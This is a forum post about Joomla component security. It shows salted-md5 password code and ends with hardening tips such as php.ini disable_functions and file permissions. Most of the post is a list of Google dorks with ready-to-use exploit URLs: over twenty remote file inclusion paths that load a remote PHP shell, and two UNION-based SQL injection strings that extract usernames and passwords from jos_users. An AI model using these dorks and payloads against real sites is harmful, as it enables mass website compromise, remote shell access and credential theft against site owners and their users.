| ToXiC |
| Moderator |
 |
|
| Joined: Dec 01, 2004 |
| Posts: 181 |
| Location: Cyprus |
|
|
 |
|
 |
|
Joomla ,by itself, considers a "secure cms" . now with version 1.0.13 also gave emphasis on md5 function and they update it to salted md5 function.
$row->password = trim($row->password);
$salt = mosMakePassword(16);
$crypt = md5($row->password.$salt);
$row->password = $crypt.':'.$salt;
where salt is a random 16 letters word.
bUT :
DO NOT INSTALL ANY COMPONENT THAT YOU DON'T CONSIDER SECURE or FROM ANY LEGIT RESOURCES.
here are some vulnerabilites on various components of joomla
(dork = google search string to find sites that had that component)
(shell = a php shell script that is located to another site)
Dork:
com_comprofiler
Expl:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[Shel]
Dork:
inurl:com_multibanners
Expl:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:com_colophon
expl:
administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=[Shell]
inurl:index.php?option=[Shell]com_simpleboard
Expl:
/components/com_simpleboard/file_upload.php?sbp=[Shell]
Dork:
inurl:"com_hashcash"
Expl:
/components/com_hashcash/server.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_htmlarea3_xtd-c"
Expl:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_sitemap"
Expl:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=[Shell]
--
Dork:
inurl:"com_forum"
Expl:
/components/com_forum/download.php?phpbb_root_path=[Shell]
--
Dork:
inurl:"com_pccookbook"
Expl:
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:index.php?option=[Shell]com_extcalendar
Expl:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:"minibb"
Expl:
/components/minibb/index.php?absolute_path=[Shell]
-
Dork:
inurl:"com_smf"
Expl:
/components/com_smf/smf.php?mosConfig_absolute_path=[Shell]
Expl:
/modules/mod_calendar.php?absolute_path=[Shell]
Dork:
inurl:"com_pollxt"
Expl:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:"com_loudmounth"
Expl:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_videodb"
Expl:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:index.php?option=[Shell]com_pcchess
Expl:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:"com_multibanners"
Expl:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:"com_a6mambohelpdesk"
Expl:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=[Shell]
Dork:
inurl:"com_colophon"
Expl:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:"com_mgm"
Expl:
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:"com_mambatstaff"
Expl:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:"com_securityimages"
Expl:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=[Shell]
Expl:
/components/com_securityimages/lang.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:"com_artlinks"
Expl:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_galleria"
Expl:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=[Shell]
SQL INJECTION
Joomla Component NeoRecruit
Dork:
inurl:index.php?option=com_NeoRecruit
Expl:
//index.php?option=com_neorecruit&task=offer_view&id=9999
9999999%20union%20select%201,concat(char(117,115,101,114,110,97,1
09,101,5Cool,username,char(32,112,97,115,115,119,111,114,100,5Cool,pa
ssword),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4
,5,0%20from%20jos_users/*
Joomla Component com_gmaps
Dork:
"index.php?option=com_gmaps"
Expl:
index.php?option=com_gmaps&task=viewmap&Itemid=57&map
Id=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/fr
om/**/jos_users/*
There are a lot more .. So BE careful on components that you install on your joomla site..
SOLUTIONS :
1) modify .htaccess file and php settings accordantly:
block ips on specific folders like administrator etc
use php.ini and add this like
allow_url_fopen = Off
disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open, tempnam
believe me this will increase by 50% your site security
Secure your configuration.php
2) chmod configuration.php file not to be viewable by everyone 644 will do
3) Use components from joomla site for your security
http://extensions.joomla.org/index.php?option=com_mtree&task=listcats&cat_id=1802&Itemid=35
or
http://help.joomla.gr/index.php?option=com_content&task=view&id=51&Itemid=2&limit=1&limitstart=5
This article will be updated soon .. |
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 107
Members: 0
Total: 107
